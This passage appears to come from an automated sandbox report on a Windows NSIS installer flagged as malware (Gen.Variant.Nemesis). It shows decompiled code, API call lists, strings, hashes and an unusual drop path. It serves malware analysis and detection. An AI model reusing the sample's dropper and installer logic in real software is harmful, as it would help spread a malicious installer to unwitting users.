                                                                          								_t175 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t169;
                                                                          								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
                                                                          									_t147 =  *((intOrPtr*)(_t155 + 8));
                                                                          									if(_t147 == 0x20 || _t147 == 0) {
                                                                          										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
                                                                          									}
                                                                          								}
                                                                          								asm("cdq");
                                                                          								asm("cdq");
                                                                          								_t164 = L" /D=" & 0x0000ffff;
                                                                          								asm("cdq");
                                                                          								_t178 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t164;
                                                                          								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
                                                                          									goto L27;
                                                                          								} else {
                                                                          									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
                                                                          									__eflags = _t155;
                                                                          									E00406282(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry", _t155);
                                                                          									L32:
                                                                          									_t151 = 0;
                                                                          									goto L33;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							goto L12;
                                                                          						}
                                                                          						do {
                                                                          							L12:
                                                                          							_t155 = _t155 + 2;
                                                                          						} while ( *_t155 == _t154);
                                                                          						goto L13;
                                                                          						L27:
                                                                          						_t155 = E00405B80(_t155, _t154);
                                                                          						if( *_t155 == 0x22) {
                                                                          							_t155 = _t155 + 2;
                                                                          						}
                                                                          						_t66 =  *_t155;
                                                                          					} while (_t66 != 0);
                                                                          					goto L32;
                                                                          				}
                                                                          				L4:
                                                                          				E004065EC(_t179); // executed
                                                                          				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
                                                                          				if( *_t179 != 0) {
                                                                          					goto L4;
                                                                          				} else {
                                                                          					E0040665C(0xa);
                                                                          					 *0x434ee4 = E0040665C(8);
                                                                          					_t56 = E0040665C(6);
                                                                          					if(_t56 != _t151) {
                                                                          						_t56 =  *_t56(0x1e);
                                                                          						if(_t56 != 0) {
                                                                          							 *0x434eef =  *0x434eef | 0x00000040;
                                                                          						}
                                                                          					}
                                                                          					goto L8;
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE ref: 00403396
                                                                          • GetVersion.KERNEL32 ref: 0040339C
                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                                          • OleInitialize.OLE32(00000000), ref: 00403413
                                                                          • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                                          • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                                            • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                            • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035D5
                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035F1
                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                                          • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                                            • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                                          • ExitProcess.KERNEL32 ref: 0040370A
                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040371D
                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040372C
                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403737
                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                                          • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
                                                                          • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                                          • ExitProcess.KERNEL32 ref: 004038B0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                          • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                          • API String ID: 2488574733-3592374750
                                                                          • Opcode ID: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                                          • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                                          • Opcode Fuzzy Hash: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                                          • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          control_flow_graph 139 405425-405440 140 405446-40550d GetDlgItem * 3 call 40424c call 404b83 GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 4055cf-4055d6 139->141 163 40552b-40552e 140->163 164 40550f-405529 SendMessageW * 2 140->164 143 405600-40560d 141->143 144 4055d8-4055fa GetDlgItem CreateThread CloseHandle 141->144 146 40562b-405635 143->146 147 40560f-405615 143->147 144->143 148 405637-40563d 146->148 149 40568b-40568f 146->149 151 405650-405659 call 40427e 147->151 152 405617-405626 ShowWindow * 2 call 40424c 147->152 153 405665-405675 ShowWindow 148->153 154 40563f-40564b call 4041f0 148->154 149->151 157 405691-405697 149->157 160 40565e-405662 151->160 152->146 161 405685-405686 call 4041f0 153->161 162 405677-405680 call 4052e6 153->162 154->151 157->151 165 405699-4056ac SendMessageW 157->165 161->149 162->161 168 405530-40553c SendMessageW 163->168 169 40553e-405555 call 404217 163->169 164->163 170 4056b2-4056dd CreatePopupMenu call 4062a4 AppendMenuW 165->170 171 4057ae-4057b0 165->171 168->169 178 405557-40556b ShowWindow 169->178 179 40558b-4055ac GetDlgItem SendMessageW 169->179 176 4056f2-405707 TrackPopupMenu 170->176 177 4056df-4056ef GetWindowRect 170->177 171->160 176->171 180 40570d-405724 176->180 177->176 181 40557a 178->181 182 40556d-405578 ShowWindow 178->182 179->171 183 4055b2-4055ca SendMessageW * 2 179->183 184 405729-405744 SendMessageW 180->184 185 405580-405586 call 40424c 181->185 182->185 183->171 184->184 186 405746-405769 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 40576b-405792 SendMessageW 186->188 188->188 189 405794-4057a8 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->171
                                                                          C-Code - Quality: 95%
                                                                          			E00405425(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                          				struct HWND__* _v8;
                                                                          				long _v12;
                                                                          				struct tagRECT _v28;
                                                                          				void* _v36;
                                                                          				signed int _v40;
                                                                          				int _v44;
                                                                          				int _v48;
                                                                          				signed int _v52;
                                                                          				int _v56;
                                                                          				void* _v60;
                                                                          				void* _v68;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				struct HWND__* _t94;
                                                                          				long _t95;
                                                                          				int _t100;
                                                                          				void* _t108;
                                                                          				intOrPtr _t119;
                                                                          				void* _t127;
                                                                          				intOrPtr _t130;
                                                                          				struct HWND__* _t134;
                                                                          				int _t156;
                                                                          				int _t159;
                                                                          				struct HMENU__* _t164;
                                                                          				struct HWND__* _t168;
                                                                          				struct HWND__* _t169;
                                                                          				int _t171;
                                                                          				void* _t172;
                                                                          				short* _t173;
                                                                          				short* _t175;
                                                                          				int _t177;
                                                                          
                                                                          				_t169 =  *0x433ec4;
                                                                          				_t156 = 0;
                                                                          				_v8 = _t169;
                                                                          				if(_a8 != 0x110) {
                                                                          					if(_a8 == 0x405) {
                                                                          						_t127 = CreateThread(0, 0, E004053B9, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                          						CloseHandle(_t127); // executed
                                                                          					}
                                                                          					if(_a8 != 0x111) {
                                                                          						L17:
                                                                          						_t171 = 1;
                                                                          						if(_a8 != 0x404) {
                                                                          							L25:
                                                                          							if(_a8 != 0x7b) {
                                                                          								goto L20;
                                                                          							}
                                                                          							_t94 = _v8;
                                                                          							if(_a12 != _t94) {
                                                                          								goto L20;
                                                                          							}
                                                                          							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                          							_a8 = _t95;
                                                                          							if(_t95 <= _t156) {
                                                                          								L36:
                                                                          								return 0;
                                                                          							}
                                                                          							_t164 = CreatePopupMenu();
                                                                          							AppendMenuW(_t164, _t156, _t171, E004062A4(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                          							_t100 = _a16;
                                                                          							_t159 = _a16 >> 0x10;
                                                                          							if(_a16 == 0xffffffff) {
                                                                          								GetWindowRect(_v8,  &_v28);
                                                                          								_t100 = _v28.left;
                                                                          								_t159 = _v28.top;
                                                                          							}
                                                                          							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                          								_v60 = _t156;
                                                                          								_v48 = 0x42d248;
                                                                          								_v44 = 0x1000;
                                                                          								_a4 = _a8;
                                                                          								do {
                                                                          									_a4 = _a4 - 1;
                                                                          									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                          								} while (_a4 != _t156);
                                                                          								OpenClipboard(_t156);
                                                                          								EmptyClipboard();
                                                                          								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                          								_a4 = _t108;
                                                                          								_t172 = GlobalLock(_t108);
                                                                          								do {
                                                                          									_v48 = _t172;
                                                                          									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                          									 *_t173 = 0xd;
                                                                          									_t175 = _t173 + 2;
                                                                          									 *_t175 = 0xa;
                                                                          									_t172 = _t175 + 2;
                                                                          									_t156 = _t156 + 1;
                                                                          								} while (_t156 < _a8);
                                                                          								GlobalUnlock(_a4);
                                                                          								SetClipboardData(0xd, _a4);
                                                                          								CloseClipboard();
                                                                          							}
                                                                          							goto L36;
                                                                          						}
                                                                          						if( *0x433eac == _t156) {
                                                                          							ShowWindow( *0x434ee8, 8);
                                                                          							if( *0x434f8c == _t156) {
                                                                          								_t119 =  *0x42c220; // 0x6ccd6c
                                                                          								_t57 = _t119 + 0x34; // 0xffffffd5
                                                                          								E004052E6( *_t57, _t156);
                                                                          							}
                                                                          							E004041F0(_t171);
                                                                          							goto L25;
                                                                          						}
                                                                          						 *0x42ba18 = 2;
                                                                          						E004041F0(0x78);
                                                                          						goto L20;
                                                                          					} else {
                                                                          						if(_a12 != 0x403) {
                                                                          							L20:
                                                                          							return E0040427E(_a8, _a12, _a16);
                                                                          						}
                                                                          						ShowWindow( *0x433eb0, _t156);
                                                                          						ShowWindow(_t169, 8);
                                                                          						E0040424C(_t169);
                                                                          						goto L17;
                                                                          					}
                                                                          				}
                                                                          				_v52 = _v52 | 0xffffffff;
                                                                          				_v40 = _v40 | 0xffffffff;
                                                                          				_t177 = 2;
                                                                          				_v60 = _t177;
                                                                          				_v56 = 0;
                                                                          				_v48 = 0;
                                                                          				_v44 = 0;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t130 =  *0x434ef4;
                                                                          				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                          				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                          				 *0x433eb0 = GetDlgItem(_a4, 0x403);
                                                                          				 *0x433ea8 = GetDlgItem(_a4, 0x3ee);
                                                                          				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                          				 *0x433ec4 = _t134;
                                                                          				_v8 = _t134;
                                                                          				E0040424C( *0x433eb0);
                                                                          				 *0x433eb4 = E00404B83(4);
                                                                          				 *0x433ecc = 0;
                                                                          				GetClientRect(_v8,  &_v28);
                                                                          				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                          				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                                          				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                          				if(_a8 >= 0) {
                                                                          					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                          					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                          				}
                                                                          				if(_a12 >= _t156) {
                                                                          					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                          				}
                                                                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                          				_push(0x1b);
                                                                          				E00404217(_a4);
                                                                          				if(( *0x434efc & 0x00000003) != 0) {
                                                                          					ShowWindow( *0x433eb0, _t156); // executed
                                                                          					if(( *0x434efc & 0x00000002) != 0) {
                                                                          						 *0x433eb0 = _t156;
                                                                          					} else {
                                                                          						ShowWindow(_v8, 8); // executed
                                                                          					}
                                                                          					E0040424C( *0x433ea8);
                                                                          				}
                                                                          				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                          				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                          				if(( *0x434efc & 0x00000004) != 0) {
                                                                          					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                          					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                          				}
                                                                          				goto L36;
                                                                          			}
                                                                          0x00000000
                                                                          0x00405707
                                                                          0x0040563d
                                                                          0x0040566d
                                                                          0x00405675
                                                                          0x00405677
                                                                          0x0040567d
                                                                          0x00405680
                                                                          0x00405680
                                                                          0x00405686
                                                                          0x00000000
                                                                          0x00405686
                                                                          0x00405641
                                                                          0x0040564b
                                                                          0x00000000
                                                                          0x0040560f
                                                                          0x00405615
                                                                          0x00405650
                                                                          0x00000000
                                                                          0x00405659
                                                                          0x0040561e
                                                                          0x00405623
                                                                          0x00405626
                                                                          0x00000000
                                                                          0x00405626
                                                                          0x0040560d
                                                                          0x00405446
                                                                          0x0040544a
                                                                          0x00405452
                                                                          0x00405456
                                                                          0x00405459
                                                                          0x0040545c
                                                                          0x0040545f
                                                                          0x00405462
                                                                          0x00405463
                                                                          0x00405464
                                                                          0x0040547d
                                                                          0x00405480
                                                                          0x0040548a
                                                                          0x00405499
                                                                          0x004054a1
                                                                          0x004054a9
                                                                          0x004054ae
                                                                          0x004054b1
                                                                          0x004054bd
                                                                          0x004054c6
                                                                          0x004054cf
                                                                          0x004054f1
                                                                          0x004054f7
                                                                          0x00405508
                                                                          0x0040550d
                                                                          0x0040551b
                                                                          0x00405529
                                                                          0x00405529
                                                                          0x0040552e
                                                                          0x0040553c
                                                                          0x0040553c
                                                                          0x00405541
                                                                          0x00405544
                                                                          0x00405549
                                                                          0x00405555
                                                                          0x0040555e
                                                                          0x0040556b
                                                                          0x0040557a
                                                                          0x0040556d
                                                                          0x00405572
                                                                          0x00405572
                                                                          0x00405586
                                                                          0x00405586
                                                                          0x0040559a
                                                                          0x004055a3
                                                                          0x004055ac
                                                                          0x004055bc
                                                                          0x004055c8
                                                                          0x004055c8
                                                                          0x00000000

                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                                          • GetClientRect.USER32(?,?), ref: 004054CF
                                                                          • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                                          • ShowWindow.USER32(?,00000008), ref: 00405572
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                                            • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004055FA
                                                                          • ShowWindow.USER32(00000000), ref: 0040561E
                                                                          • ShowWindow.USER32(?,00000008), ref: 00405623
                                                                          • ShowWindow.USER32(00000008), ref: 0040566D
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                                          • CreatePopupMenu.USER32 ref: 004056B2
                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                                          • GetWindowRect.USER32(?,?), ref: 004056E6
                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                                          • OpenClipboard.USER32(00000000), ref: 00405747
                                                                          • EmptyClipboard.USER32 ref: 0040574D
                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                                          • CloseClipboard.USER32 ref: 004057A8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                          • String ID: {
                                                                          • API String ID: 590372296-366298937
                                                                          • Opcode ID: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                                          • Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
                                                                          • Opcode Fuzzy Hash: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                                          • Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 66$>tFy$Hj#$I*x$M}J$T4b$TW_$[Bg+$q)yb$}wL$.Z/$2H$NmE$@
                                                                          • API String ID: 0-1650154920
                                                                          • Opcode ID: 7de764ecea91044ada11bc028ad7d39e642eb466e6ad2b07a4c054e9c77d1f33
                                                                          • Instruction ID: 41260d22ed297fa6a6f8c93dda6815e416c38c6cdbbfe2e948447276a37c3835
                                                                          • Opcode Fuzzy Hash: 7de764ecea91044ada11bc028ad7d39e642eb466e6ad2b07a4c054e9c77d1f33
                                                                          • Instruction Fuzzy Hash: 82831175500347CFDB265E38CA6A3DABB72EF533A0F9541AACC869B664D33505C6CB02
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          [Figure: control-flow graph of function 00405990; legend: Executed / Not Executed]
                                                                          C-Code - Quality: 98%
                                                                          			E00405990(void* __eflags, signed int _a4, signed int _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				short _v556;
                                                                          				short _v558;
                                                                          				struct _WIN32_FIND_DATAW _v604;
                                                                          				signed int _t38;
                                                                          				signed int _t52;
                                                                          				signed int _t55;
                                                                          				signed int _t62;
                                                                          				void* _t64;
                                                                          				signed char _t65;
                                                                          				WCHAR* _t66;
                                                                          				void* _t67;
                                                                          				WCHAR* _t68;
                                                                          				void* _t70;
                                                                          
                                                                          				_t65 = _a8;
                                                                          				_t68 = _a4;
                                                                          				_v8 = _t65 & 0x00000004;
                                                                          				_t38 = E00405C5B(__eflags, _t68);
                                                                          				_v12 = _t38;
                                                                          				if((_t65 & 0x00000008) != 0) {
                                                                          					_t62 = DeleteFileW(_t68); // executed
                                                                          					asm("sbb eax, eax");
                                                                          					_t64 =  ~_t62 + 1;
                                                                          					 *0x434f88 =  *0x434f88 + _t64;
                                                                          					return _t64;
                                                                          				}
                                                                          				_a4 = _t65;
                                                                          				_t8 =  &_a4;
                                                                          				 *_t8 = _a4 & 0x00000001;
                                                                          				__eflags =  *_t8;
                                                                          				if( *_t8 == 0) {
                                                                          					L5:
                                                                          					E00406282(0x42f250, _t68);
                                                                          					__eflags = _a4;
                                                                          					if(_a4 == 0) {
                                                                          						E00405B9F(_t68);
                                                                          					} else {
                                                                          						lstrcatW(0x42f250, L"\\*.*");
                                                                          					}
                                                                          					__eflags =  *_t68;
                                                                          					if( *_t68 != 0) {
                                                                          						L10:
                                                                          						lstrcatW(_t68, 0x40a014);
                                                                          						L11:
                                                                          						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                          						_t38 = FindFirstFileW(0x42f250,  &_v604);
                                                                          						_t70 = _t38;
                                                                          						__eflags = _t70 - 0xffffffff;
                                                                          						if(_t70 == 0xffffffff) {
                                                                          							L26:
                                                                          							__eflags = _a4;
                                                                          							if(_a4 != 0) {
                                                                          								_t30 = _t66 - 2;
                                                                          								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                          								__eflags =  *_t30;
                                                                          							}
                                                                          							goto L28;
                                                                          						} else {
                                                                          							goto L12;
                                                                          						}
                                                                          						do {
                                                                          							L12:
                                                                          							__eflags = _v604.cFileName - 0x2e;
                                                                          							if(_v604.cFileName != 0x2e) {
                                                                          								L16:
                                                                          								E00406282(_t66,  &(_v604.cFileName));
                                                                          								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                          								if(__eflags == 0) {
                                                                          									_t52 = E00405948(__eflags, _t68, _v8);
                                                                          									__eflags = _t52;
                                                                          									if(_t52 != 0) {
                                                                          										E004052E6(0xfffffff2, _t68);
                                                                          									} else {
                                                                          										__eflags = _v8 - _t52;
                                                                          										if(_v8 == _t52) {
                                                                          											 *0x434f88 =  *0x434f88 + 1;
                                                                          										} else {
                                                                          											E004052E6(0xfffffff1, _t68);
                                                                          											E00406048(_t67, _t68, 0);
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									__eflags = (_a8 & 0x00000003) - 3;
                                                                          									if(__eflags == 0) {
                                                                          										E00405990(__eflags, _t68, _a8);
                                                                          									}
                                                                          								}
                                                                          								goto L24;
                                                                          							}
                                                                          							__eflags = _v558;
                                                                          							if(_v558 == 0) {
                                                                          								goto L24;
                                                                          							}
                                                                          							__eflags = _v558 - 0x2e;
                                                                          							if(_v558 != 0x2e) {
                                                                          								goto L16;
                                                                          							}
                                                                          							__eflags = _v556;
                                                                          							if(_v556 == 0) {
                                                                          								goto L24;
                                                                          							}
                                                                          							goto L16;
                                                                          							L24:
                                                                          							_t55 = FindNextFileW(_t70,  &_v604);
                                                                          							__eflags = _t55;
                                                                          						} while (_t55 != 0);
                                                                          						_t38 = FindClose(_t70);
                                                                          						goto L26;
                                                                          					}
                                                                          					__eflags =  *0x42f250 - 0x5c;
                                                                          					if( *0x42f250 != 0x5c) {
                                                                          						goto L11;
                                                                          					}
                                                                          					goto L10;
                                                                          				} else {
                                                                          					__eflags = _t38;
                                                                          					if(_t38 == 0) {
                                                                          						L28:
                                                                          						__eflags = _a4;
                                                                          						if(_a4 == 0) {
                                                                          							L36:
                                                                          							return _t38;
                                                                          						}
                                                                          						__eflags = _v12;
                                                                          						if(_v12 != 0) {
                                                                          							_t38 = E004065C5(_t68);
                                                                          							__eflags = _t38;
                                                                          							if(_t38 == 0) {
                                                                          								goto L36;
                                                                          							}
                                                                          							E00405B53(_t68);
                                                                          							_t38 = E00405948(__eflags, _t68, _v8 | 0x00000001);
                                                                          							__eflags = _t38;
                                                                          							if(_t38 != 0) {
                                                                          								return E004052E6(0xffffffe5, _t68);
                                                                          							}
                                                                          							__eflags = _v8;
                                                                          							if(_v8 == 0) {
                                                                          								goto L30;
                                                                          							}
                                                                          							E004052E6(0xfffffff1, _t68);
                                                                          							return E00406048(_t67, _t68, 0);
                                                                          						}
                                                                          						L30:
                                                                          						 *0x434f88 =  *0x434f88 + 1;
                                                                          						return _t38;
                                                                          					}
                                                                          					__eflags = _t65 & 0x00000002;
                                                                          					if((_t65 & 0x00000002) == 0) {
                                                                          						goto L28;
                                                                          					}
                                                                          					goto L5;
                                                                          				}
                                                                          			}



















                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 004059B9
                                                                          • lstrcatW.KERNEL32(0042F250,\*.*), ref: 00405A01
                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405A24
                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 00405A2A
                                                                          • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 00405A3A
